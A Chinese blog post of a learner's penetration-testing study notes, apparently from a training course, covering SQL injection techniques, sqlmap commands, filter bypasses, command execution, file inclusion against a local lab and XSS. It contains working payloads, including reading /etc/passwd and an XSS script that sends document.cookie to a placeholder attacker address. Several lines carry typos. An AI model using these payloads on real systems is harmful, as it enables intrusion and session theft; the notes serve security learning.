网络安全之路:我的系统性渗透测试学习框架

没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!)

注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦!

写在前面:

1.业界比较好的信息安全网站:

freebuff:这个看来你已经找到了

secWiKi:ennnnn

安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有,前段时间发现美团外卖安卓app有时候在下单选地址页面可以看到别人的隐私信息哦,可能就是个bug吧hahahaha

看雪:主要为移动安全

你要是问我这些哪里来的,我只能说华为的安全工程师天天在上这些网站,哈哈哈

2.如果我笔记当中看到自己不知道的业界名词或者知识,马上去百度一下哦!

基本完整渗透测试框架图:

以下是跟着四个导师学习实践的学习笔记哦,可能有些只有我自己懂,但我会慢慢完善的呢,导师我就不介绍了,做安全的对这些很敏感的呀,所以除了知识就不要相信我的话,会迷糊你的,这些叫什么,social engineering哈哈哈,导师都是企业实践五六年的老行家了,等保测评师呀,渗透测试高级工程师呀等等等的。

Day1:谈心培养兴趣

Day 2:

Chmod

Mv    修改文件名

http请求包含:

请求行

请求头

请求正文

 

Get请求没有请求正文

 

GET vs POST

1.请求参数

-get

 

501 方法未实现

3xx  重定向

 

Sql 注入:

1.判断 '或者"

2.注释:# 或者  - -

联合查询:

1.Order by

2.union select 1,2

3.库 database()

4.表 information_schema.tables

5.列  union select column_name,2 from information_schema.columns where table_schema=database() and able_name='users'#

6.内容 union select user,password from users#

And ascii(mid((select user from user 0,1),1,1))>96

布尔注入(暴力注入):

And 1=1

And 1=2

表 exists(select * from users)

列 exists(select  列名 from users)

内容 and select user from users limit 1,2     /   select mid("hello word",2,1)从第二个开始取一个

 

0-9:   48                  0x30

a-z:    97                      0x61                        select ascii('A')

select ascii('A')

A-Z    65                  0x65

URL编码:%号开头 ,%20就是空格

Sleep()延时用法 Select if(exist(select * frrom user),sleep(5),3)

作业:hub.docker.com

3,5,9题

Docker pull

Docker run

Day3:

comcat(“hell”,"word!")拼接

Select ord(':')  查看accii

Hex(68)   查十六进制

Group_concat(username,0x3a,password)一行显示

-报错注入:

-floor

Select floor((rand(0)*2)

 

Rand(0)随机数

-updatexml(1,comcat(0x7e,version(),0x7e),3)    version()可以替换成sql语句

-extractvalue    同理上

-二阶注入:

-insert into users claus('admin','pwd')

-update usersset pwd='123' where name='name'

-万能密码

-文件读写

-前提:

-File

-my.cnf/my.ini

-secure_file_priv=''

-读文件

-load_file ('path')绝对路径

Etc/passwd存放用户信息

-写文件

-into outfile 'path'

-into dumpfile 'path'

-绕过技术

-替换or=|| and =&&

-大小写

-双写   对抗这个可以用循环持续过滤,直到没有

-内联注释

-空格 %20+ --- 、))、 %a0 %0b  --=ss  %2b

-注释 # +--+  ---->   闭合  就是将后面的也闭合

-POST

 

-sqlmap

-基本使用

1.判断

Sqlmap -u "url"

2.库

sqlmap -u "url" --dbs /--current-db

3.表

sqlmap -u "url" -D db --tables

4.列

sqlmap -u "url" -D db -T tb --columns

5.内容

sqlmap -u "url" -D db -T tb -C col --dump

对于post类型

Sqlmap -r 1.txt

 

Sqlmap -r 1.txt -vv -D security                                     --v显示详细信息,包括输入了什么内容

 

 

 

-写tamper

DAY 4

-命令执行

-多条命令符号

||(或者)前面为假的时候后面才可以执行

|

&&   一个&

后台运行

Wget

Echo

-文件包含

-#include<stdio.h>

-PHP    include()  require()

Config.inc.php --db

例子:http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd

-LFI

-无论后缀名是什么,只要里面有php代码,都会被执行

-php伪协议

-php://filter/read=convert.base64-encode/resource=1.php

<?php

System('whoami')

?>

-RFI

-http://localhost:8001/vulnerabilities/fi/?page=http://192.168.38.1/1.txt远程文件包含

-

-XSS(html注入)

-js语句

-document.cookie获取cookie

-存储型

<script>document.location='http://你的地址'+document.cookie</script>

<script>

document.write("img src='http://"+document.cookie+"'/>");

</script>

-文件上传(抓包,发送reper,修改后缀)

-一句话

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平静愉悦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值